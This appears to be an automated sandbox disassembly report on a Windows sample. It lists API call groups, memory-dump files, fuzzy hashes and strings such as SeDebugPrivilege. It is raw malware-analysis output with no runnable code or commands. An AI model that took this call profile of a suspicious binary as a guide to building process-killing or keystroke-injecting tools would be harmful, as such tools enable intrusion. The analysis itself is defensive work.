                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
                    • SysFreeString.OLEAUT32(?), ref: 00478F00
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                    • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                    • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                    • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                    APIs
                    • _memset.LIBCMT ref: 0047F6B5
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                    • CloseHandle.KERNEL32(?), ref: 0047FAAB
                    • CloseHandle.KERNEL32(?), ref: 0047FB22
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: 672ed7388afacd0d872fab5b0b0eb3ddfdca08b89d017b8929350983388c545e
                    • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                    • Opcode Fuzzy Hash: 672ed7388afacd0d872fab5b0b0eb3ddfdca08b89d017b8929350983388c545e
                    • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                    APIs
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                      • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                    • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                    • _wcscmp.LIBCMT ref: 00464D5A
                    • MoveFileW.KERNEL32(?,?), ref: 00464D75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                    • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                    • Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                    • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                    • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                    • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                    • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                    • DestroyIcon.USER32(00000000), ref: 0043C37F
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                    • DestroyIcon.USER32(?), ref: 0043C3AB
                      • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                    • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                    • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                    • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                    APIs
                      • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                      • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                      • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                    • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                    • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                    • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                    • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                    • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                    • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                    • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                    • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                    • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                    • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                    • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                    APIs
                      • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                      • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                      • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                      • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                    • _memset.LIBCMT ref: 00479813
                    • _memset.LIBCMT ref: 00479956
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                    • CoTaskMemFree.OLE32(?), ref: 0047998D
                    Strings
                    • NULL Pointer assignment, xrefs: 004799DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                    • _wcscat.LIBCMT ref: 00486EAD
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    APIs
                      • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                      • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                      • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                    • GetLastError.KERNEL32 ref: 0047E9B7
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                    • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                    • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                    • LoadStringW.USER32(00000000), ref: 00464319
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                    • LoadStringW.USER32(00000000), ref: 00464336
                    • _wprintf.LIBCMT ref: 0046435C
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    APIs
                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                    • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                    • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                    • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                    • EnterCriticalSection.KERNEL32(?), ref: 00467130
                    • _memmove.LIBCMT ref: 0046717E
                    • _memmove.LIBCMT ref: 0046719B
                    • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 004861EB
                    • GetDC.USER32(00000000), ref: 004861F3
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                    • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • _wcstok.LIBCMT ref: 0046EC94
                    • _wcscpy.LIBCMT ref: 0046ED23
                    • _memset.LIBCMT ref: 0046ED56
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    APIs
                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                    • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                    • inet_ntoa.WSOCK32(?), ref: 00476CA7
                      • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                      • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                    • _strlen.LIBCMT ref: 00476D44
                    • _memmove.LIBCMT ref: 00476DAD
                    Similarity
                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                    • String ID:
                    • API String ID: 3619996494-0
                    APIs
                    • IsWindow.USER32(00BA2928), ref: 0048B3EB
                    • IsWindowEnabled.USER32(00BA2928), ref: 0048B3F7
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                    • SendMessageW.USER32(00BA2928,000000B0,?,?), ref: 0048B512
                    • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                    • GetWindowLongW.USER32(00BA2928,000000EC), ref: 0048B571
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    APIs
                    • _memset.LIBCMT ref: 0047F448
                    • _memset.LIBCMT ref: 0047F511
                    • ShellExecuteExW.SHELL32(?), ref: 0047F556
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                    • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                    • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    APIs
                    • GetParent.USER32(?), ref: 00460F8C
                    • GetKeyboardState.USER32(?), ref: 00460FA1
                    • SetKeyboardState.USER32(?), ref: 00461002
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    • GetParent.USER32(00000000), ref: 00460DA5
                    • GetKeyboardState.USER32(?), ref: 00460DBA
                    • SetKeyboardState.USER32(?), ref: 00460E1B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    APIs
                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: ErrorMode$AddressCreateInstanceProc
                    • String ID: ,,I$DllGetClassObject
                    • API String ID: 753597075-1683996018
                    APIs
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                      • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                    • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                    • _wcscmp.LIBCMT ref: 004636D3
                    • MoveFileW.KERNEL32(?,?), ref: 004636EB
                    • _wcscat.LIBCMT ref: 00463733
                    • SHFileOperationW.SHELL32(?), ref: 0046379F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    APIs
                    • _memset.LIBCMT ref: 004872AA
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                    • IsMenu.USER32(?), ref: 00487369
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                    • DrawMenuBar.USER32 ref: 004873C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                    • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                      • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
